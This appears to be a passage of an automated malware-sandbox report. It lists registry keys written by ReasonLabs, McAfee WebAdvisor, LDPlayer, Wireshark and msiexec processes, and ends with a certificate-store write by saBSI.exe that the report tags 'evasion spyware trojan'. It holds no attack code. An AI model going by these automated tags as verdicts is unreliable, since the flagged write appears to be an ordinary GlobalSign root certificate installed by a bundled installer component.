Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Program Files\McAfee\WebAdvisor\updater.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Program Files\McAfee\WebAdvisor\updater.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Program Files\ReasonLabs\EPP\rsWSC.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Program Files\ReasonLabs\EPP\rsWSC.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Program Files\McAfee\WebAdvisor\ServiceHost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Program Files\ReasonLabs\EPP\rsEngineSvc.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Program Files\McAfee\WebAdvisor\updater.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Program Files\ReasonLabs\EPP\rsEngineSvc.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Program Files\McAfee\WebAdvisor\ServiceHost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Program Files\McAfee\WebAdvisor\updater.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Program Files\ReasonLabs\EPP\rsWSC.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Program Files\McAfee\WebAdvisor\ServiceHost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Program Files\McAfee\WebAdvisor\updater.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Program Files\ReasonLabs\EPP\rsWSC.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Program Files\McAfee\WebAdvisor\ServiceHost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Program Files\McAfee\WebAdvisor\updater.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Program Files\ReasonLabs\EPP\rsEngineSvc.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Program Files\McAfee\WebAdvisor\ServiceHost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Program Files\McAfee\WebAdvisor\updater.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My C:\Program Files\ReasonLabs\EPP\rsEngineSvc.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2e C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Program Files\McAfee\WebAdvisor\ServiceHost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Program Files\McAfee\WebAdvisor\updater.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Program Files\McAfee\WebAdvisor\ServiceHost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Program Files\ReasonLabs\EPP\rsWSC.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Program Files\ReasonLabs\EPP\rsWSC.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Program Files\McAfee\WebAdvisor\updater.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Program Files\ReasonLabs\EPP\rsWSC.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2b C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Program Files\ReasonLabs\EPP\rsWSC.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Program Files\McAfee\WebAdvisor\updater.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Program Files\ReasonLabs\EPP\rsEngineSvc.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\27DD5200959A5B540A3AE7EF1BA50805 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{20191216-E5DB-4D2C-BAAA-C71053A6236D}\ = "IGuestOSType" C:\Windows\SYSTEM32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{20191216-1F04-4191-AA2F-1FAC9646AE4C}\ = "IProgressEvent" C:\Windows\SYSTEM32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{20191216-CB8D-4382-90BA-B7DA78A74573}\NumMethods C:\Windows\SYSTEM32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{20191216-8690-11E9-B83D-5719E53CF1DE}\NumMethods\ = "52" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{20191216-7997-4595-A731-3A509DB604E5} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{20191216-F4F4-4DD0-9D30-C89B873247EC}\TypeLib\Version = "1.3" C:\Program Files\ldplayer9box\Ld9BoxSVC.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{20191216-6588-40A3-9B0A-68C05BA52C4B}\TypeLib\ = "{20191216-1750-46f0-936e-bd127d5bc264}" C:\Program Files\ldplayer9box\Ld9BoxSVC.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{20191216-CC7B-431B-98B2-951FDA8EAB89} C:\Windows\SYSTEM32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{20191216-9B2D-4377-BFE6-9702E881516B} C:\Windows\SYSTEM32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{20191216-B5BB-4316-A900-5EB28D3413DF}\NumMethods\ = "229" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{20191216-E4B1-486A-8F2E-747AE346C3E9} C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{20191216-5FDC-4ABA-AFF5-6A39BBD7C38B} C:\Windows\SYSTEM32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{20191216-0FF7-46B7-A138-3C6E5AC946B4} C:\Windows\SYSTEM32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{20191216-1807-4249-5BA5-EA42D66AF0BF}\InProcServer32 C:\Windows\SYSTEM32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{20191216-FD1C-411A-95C5-E9BB1414E632}\NumMethods\ = "23" C:\Windows\SYSTEM32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{20191216-FA1E-4CEE-91C7-6D8496BEA3C1}\NumMethods C:\Windows\SYSTEM32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{20191216-BE30-49C0-B315-E9749E1BDED1}\NumMethods C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{20191216-9641-4397-854A-040439D0114B}\ = "IGuestScreenInfo" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{20191216-8384-11E9-921D-8B984E28A686}\TypeLib C:\Program Files\ldplayer9box\Ld9BoxSVC.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{20191216-A862-4DC9-8C89-BF4BA74A886A}\TypeLib C:\Program Files\ldplayer9box\Ld9BoxSVC.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{20191216-0B79-4350-BDD9-A0376CD6E6E3}\ = "IExtPackBase" C:\Windows\SYSTEM32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{20191216-C927-11E7-B788-33C248E71FC7} C:\Windows\SYSTEM32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{20191216-7556-4CBC-8C04-043096B02D82}\NumMethods C:\Windows\SYSTEM32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{20191216-E8B8-4838-B10C-45BA193734C1}\NumMethods C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{20191216-1640-41f9-bd74-3ef5fd653250} C:\Program Files\ldplayer9box\Ld9BoxSVC.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{20191216-5F86-4D65-AD1B-87CA284FB1C8} C:\Windows\SYSTEM32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{20191216-D545-44AA-8013-181B8C288554} C:\Windows\SYSTEM32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{20191216-D8ED-44CF-85AC-C83A26C95A4D}\NumMethods C:\Program Files\ldplayer9box\Ld9BoxSVC.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{20191216-c9d2-4f11-a384-53f0cf917214}\InprocServer32 C:\Program Files\ldplayer9box\Ld9BoxSVC.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ntar C:\Users\Admin\Downloads\Wireshark-4.2.5-x64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{20191216-0721-4CDE-867C-1A82ABAF914C}\ProxyStubClsid32\ = "{20191216-1807-4249-5BA5-EA42D66AF0BF}" C:\Windows\SYSTEM32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{20191216-2F05-4D28-855F-488F96BAD2B2}\NumMethods\ = "14" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\ldmnq.apk\DefaultIcon\ = "F:\\LDPlayer\\LDPlayer9\\apk_icon.ico" F:\LDPlayer\LDPlayer9\LDPlayer.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{20191216-C196-4D26-B8DB-4C8C389F1F82}\TypeLib\ = "{20191216-1750-46f0-936e-bd127d5bc264}" C:\Program Files\ldplayer9box\Ld9BoxSVC.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{20191216-3188-4C8C-8756-1395E8CB691C}\NumMethods C:\Windows\SYSTEM32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{20191216-2F1A-4D6C-81FC-E3FA843F49AE}\ = "IFile" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{20191216-319C-4E7E-8150-C5837BD265F6} C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{20191216-2FD3-47E2-A5DC-2C2431D833CC}\ProxyStubClsid32 C:\Program Files\ldplayer9box\Ld9BoxSVC.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{20191216-4737-457B-99FC-BC52C851A44F}\NumMethods C:\Program Files\ldplayer9box\Ld9BoxSVC.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\VirtualBox.VirtualBox.1\CLSID C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{20191216-C6FA-430E-6020-6A505D086387} C:\Windows\SYSTEM32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{20191216-04D0-4DB6-8D66-DC2F033120E1}\ = "IAudioAdapterChangedEvent" C:\Windows\SYSTEM32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{20191216-8F30-401B-A8CD-FE31DBE839C0}\NumMethods\ = "12" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{20191216-F4F4-4DD0-9D30-C89B873247EC} C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{20191216-8ce7-469f-a4c2-6476f581ff72} C:\Program Files\ldplayer9box\Ld9BoxSVC.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{20191216-4737-457B-99FC-BC52C851A44F}\TypeLib C:\Program Files\ldplayer9box\Ld9BoxSVC.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{20191216-1EC6-4883-801D-77F56CFD0103}\ = "INetworkAdapterChangedEvent" C:\Windows\SYSTEM32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{20191216-F4F4-4DD0-9D30-C89B873247EC}\ = "IGuestMultiTouchEvent" C:\Windows\SYSTEM32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{20191216-61D9-4940-A084-E6BB29AF3D83}\NumMethods\ = "13" C:\Windows\SYSTEM32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{20191216-3FF2-4F2E-8F09-07382EE25088}\NumMethods\ = "14" C:\Windows\SYSTEM32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{20191216-26F1-4EDB-8DD2-6BDDD0912368}\ProxyStubClsid32\ = "{20191216-1807-4249-5BA5-EA42D66AF0BF}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{20191216-EBF9-4D5C-7AEA-877BFC4256BA}\ProxyStubClsid32\ = "{20191216-1807-4249-5BA5-EA42D66AF0BF}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\HKEY_LOCAL_MACHINE\SOFTWARE\Classes\ldmnq.apk\DefaultIcon\ = "F:\\LDPlayer\\LDPlayer9\\apk_icon.ico" F:\LDPlayer\LDPlayer9\LDPlayer.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{20191216-AC97-4C16-B3E2-81BD8A57CC27}\NumMethods C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{20191216-929C-40E8-BF16-FEA557CD8E7E}\NumMethods\ = "115" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{20191216-0FF7-46B7-A138-3C6E5AC946B4}\ProxyStubClsid32 C:\Program Files\ldplayer9box\Ld9BoxSVC.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{20191216-c8e9-466b-9660-45cb3e9979e4} C:\Program Files\ldplayer9box\Ld9BoxSVC.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{20191216-4289-ef4e-8e6a-e5b07816b631} C:\Program Files\ldplayer9box\Ld9BoxSVC.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{20191216-7966-481D-AB0B-D0ED73E28135}\TypeLib C:\Program Files\ldplayer9box\Ld9BoxSVC.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{20191216-0126-43E0-B05D-326E74ABB356}\NumMethods C:\Program Files\ldplayer9box\Ld9BoxSVC.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{20191216-7BDC-11E9-8BC2-8FFDB8B19219} C:\Windows\SYSTEM32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{20191216-EE61-462F-AED3-0DFF6CBF9904}\NumMethods\ = "16" C:\Windows\SYSTEM32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{20191216-0721-4CDE-867C-1A82ABAF914C}\ProxyStubClsid32 C:\Windows\SysWOW64\regsvr32.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8\Blob = 1900000001000000100000005d1b8ff2c30f63f5b536edd400f7f9b40300000001000000140000004efc31460c619ecae59c1bce2c008036d94c84b809000000010000000c000000300a06082b060105050703031d00000001000000100000005467b0adde8d858e30ee517b1a19ecd91400000001000000140000001f00bf46800afc7839b7a5b443d95650bbce963b53000000010000001f000000301d301b060567810c010330123010060a2b0601040182373c0101030200c06200000001000000200000007b9d553e1c92cb6e8803e137f4f287d4363757f5d44b37d52f9fca22fb97df860b000000010000004200000047006c006f00620061006c005300690067006e00200043006f006400650020005300690067006e0069006e006700200052006f006f007400200052003400350000000f0000000100000030000000c130bba37b8b350e89fd5ed76b4f78777feee220d3b9e729042bef6af46e8e4c1b252e32b3080c681bc9a8a1afdd0a3c200000000100000076050000308205723082035aa00302010202107653feac75464893f5e5d74a483a4ef8300d06092a864886f70d01010c05003053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f7420523435301e170d3230303331383030303030305a170d3435303331383030303030305a3053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f742052343530820222300d06092a864886f70d01010105000382020f003082020a0282020100b62dc530dd7ae8ab903d0372b03a4b991661b2e5ffa5671d371ce57eec9383aa84f5a3439b98458ab863575d9b00880425e9f868924b82d84bc94a03f3a87f6a8f8a6127bda144d0fdf53f22c2a34f918db305b22882915dfb5988050b9706c298f82ca73324ee503a41ccf0a0b07b1d4dd2a8583896e9dff91b91bb8b102cd2c7431da20974a180af7be6330a0c596b8ebcf4ab5a977b7fae55fb84f080fe844cd7e2babdc475a16fbd61107444b29807e274abff68dc6c263ee91fe5e00487ad30d30c8d037c55b816705c24782025eb676788abba4e34986b7011de38cad4bea1c09ce1df1e0201d83be1674384b6cffc74b72f84a3bfba09373d676cb1455c1961ab4183f5ac1deb770d464773cebfbd9595ed9d2b8810fefa58e8a757e1b3cfa85ae907259b12c49e80723d93dc8c94df3b44e62680fcd2c303f08c0cd245d62ee78f989ee604ee426e677e42167162e704f960c664a1b69c81214e2bc66d689486c699747367317a91f2d48c796e7ca6bb7e466f4dc585122bcf9a224408a88537ce07615706171224c0c43173a1983557477e103a45d92da4519098a9a00737c4651aaa1c6b1677f7a797ec3f1930996f31fbea40b2e7d2c4fac9d0f050767459fa8d6d1732bef8e97e03f4e787759ad44a912c850313022b4280f2896a36cfc84ca0ce9ef8cb8dad16a7d3ded59b18a7c6923af18263f12e0e2464df0203010001a3423040300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e041604141f00bf46800afc7839b7a5b443d95650bbce963b300d06092a864886f70d01010c050003820201005e2bba749734445f764828408493ee016ee9a1b3d68025e67be4bc09913d0ffc76add7d43020bb8f60d091d61cf29cef781a2b943202c12496525202d0f3d1fcf29b396e99e11f8e43417d9a1e5bc95d9a84fc26e687f3747226ada41bd93d3b6a52a03c091e2f1e7bb333b445c7f7acb1af9360ad76aeb8b21578eb836aebffdb46ab24e5ee02fa901f59c02f5dd6b75da45c10b77253f8414eccfa781a254acafe85624361c3b437aa81d2f4d63a0fbd8d597e3047de2b6be72150335fd4679bd4b8679f3c279903ff85438e7312ca20cde861d5b166dc17d6396d0fdbcf2337a182894e1c6b3fd6a0cdaa079d3e4226aad70ceefa47bf1a527ed17581d3c98a62176d4f88a021a0263eaf6dd962301fe99828ae6e8dd58e4c726693808d2ae355c760679042565c22510fb3dc4e39ee4dddd91d7810543b6ed0976f03b51eb22373c612b29a64d0fc958524a8ffdfa1b0dc9140aedf0933abb9dd92b7f1cc91743b69eb67971b90bfe7c7a06f71bb57bfb78f5aed7a406a16cd80842d2fe102d4249443b315fc0c2b1bfd716ffccbbc75173a5e83d2c9b32f1bd59c8d7f54fe7e7ee456a387a79de1595294418f6d5bbe86959aff1a76dd40d2514a70b41f336323773fec271e59e40887ed34824a0f3ffea01dc1f56773458678f4aa29e92787c619dbc61314c33949874da097e06513f59d7756e9dab358c73af2c0cd82 C:\Users\Admin\AppData\Local\Temp\is-K0IBL.tmp\component1_extract\saBSI.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8\Blob = 040000000100000010000000e94fb54871208c00df70f708ac47085b0f0000000100000030000000c130bba37b8b350e89fd5ed76b4f78777feee220d3b9e729042bef6af46e8e4c1b252e32b3080c681bc9a8a1afdd0a3c0b000000010000004200000047006c006f00620061006c005300690067006e00200043006f006400650020005300690067006e0069006e006700200052006f006f007400200052003400350000006200000001000000200000007b9d553e1c92cb6e8803e137f4f287d4363757f5d44b37d52f9fca22fb97df8653000000010000001f000000301d301b060567810c010330123010060a2b0601040182373c0101030200c01400000001000000140000001f00bf46800afc7839b7a5b443d95650bbce963b1d00000001000000100000005467b0adde8d858e30ee517b1a19ecd909000000010000000c000000300a06082b060105050703030300000001000000140000004efc31460c619ecae59c1bce2c008036d94c84b81900000001000000100000005d1b8ff2c30f63f5b536edd400f7f9b4200000000100000076050000308205723082035aa00302010202107653feac75464893f5e5d74a483a4ef8300d06092a864886f70d01010c05003053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f7420523435301e170d3230303331383030303030305a170d3435303331383030303030305a3053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f742052343530820222300d06092a864886f70d01010105000382020f003082020a0282020100b62dc530dd7ae8ab903d0372b03a4b991661b2e5ffa5671d371ce57eec9383aa84f5a3439b98458ab863575d9b00880425e9f868924b82d84bc94a03f3a87f6a8f8a6127bda144d0fdf53f22c2a34f918db305b22882915dfb5988050b9706c298f82ca73324ee503a41ccf0a0b07b1d4dd2a8583896e9dff91b91bb8b102cd2c7431da20974a180af7be6330a0c596b8ebcf4ab5a977b7fae55fb84f080fe844cd7e2babdc475a16fbd61107444b29807e274abff68dc6c263ee91fe5e00487ad30d30c8d037c55b816705c24782025eb676788abba4e34986b7011de38cad4bea1c09ce1df1e0201d83be1674384b6cffc74b72f84a3bfba09373d676cb1455c1961ab4183f5ac1deb770d464773cebfbd9595ed9d2b8810fefa58e8a757e1b3cfa85ae907259b12c49e80723d93dc8c94df3b44e62680fcd2c303f08c0cd245d62ee78f989ee604ee426e677e42167162e704f960c664a1b69c81214e2bc66d689486c699747367317a91f2d48c796e7ca6bb7e466f4dc585122bcf9a224408a88537ce07615706171224c0c43173a1983557477e103a45d92da4519098a9a00737c4651aaa1c6b1677f7a797ec3f1930996f31fbea40b2e7d2c4fac9d0f050767459fa8d6d1732bef8e97e03f4e787759ad44a912c850313022b4280f2896a36cfc84ca0ce9ef8cb8dad16a7d3ded59b18a7c6923af18263f12e0e2464df0203010001a3423040300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e041604141f00bf46800afc7839b7a5b443d95650bbce963b300d06092a864886f70d01010c050003820201005e2bba749734445f764828408493ee016ee9a1b3d68025e67be4bc09913d0ffc76add7d43020bb8f60d091d61cf29cef781a2b943202c12496525202d0f3d1fcf29b396e99e11f8e43417d9a1e5bc95d9a84fc26e687f3747226ada41bd93d3b6a52a03c091e2f1e7bb333b445c7f7acb1af9360ad76aeb8b21578eb836aebffdb46ab24e5ee02fa901f59c02f5dd6b75da45c10b77253f8414eccfa781a254acafe85624361c3b437aa81d2f4d63a0fbd8d597e3047de2b6be72150335fd4679bd4b8679f3c279903ff85438e7312ca20cde861d5b166dc17d6396d0fdbcf2337a182894e1c6b3fd6a0cdaa079d3e4226aad70ceefa47bf1a527ed17581d3c98a62176d4f88a021a0263eaf6dd962301fe99828ae6e8dd58e4c726693808d2ae355c760679042565c22510fb3dc4e39ee4dddd91d7810543b6ed0976f03b51eb22373c612b29a64d0fc958524a8ffdfa1b0dc9140aedf0933abb9dd92b7f1cc91743b69eb67971b90bfe7c7a06f71bb57bfb78f5aed7a406a16cd80842d2fe102d4249443b315fc0c2b1bfd716ffccbbc75173a5e83d2c9b32f1bd59c8d7f54fe7e7ee456a387a79de1595294418f6d5bbe86959aff1a76dd40d2514a70b41f336323773fec271e59e40887ed34824a0f3ffea01dc1f56773458678f4aa29e92787c619dbc61314c33949874da097e06513f59d7756e9dab358c73af2c0cd82 C:\Users\Admin\AppData\Local\Temp\is-K0IBL.tmp\component1_extract\saBSI.exe N/A
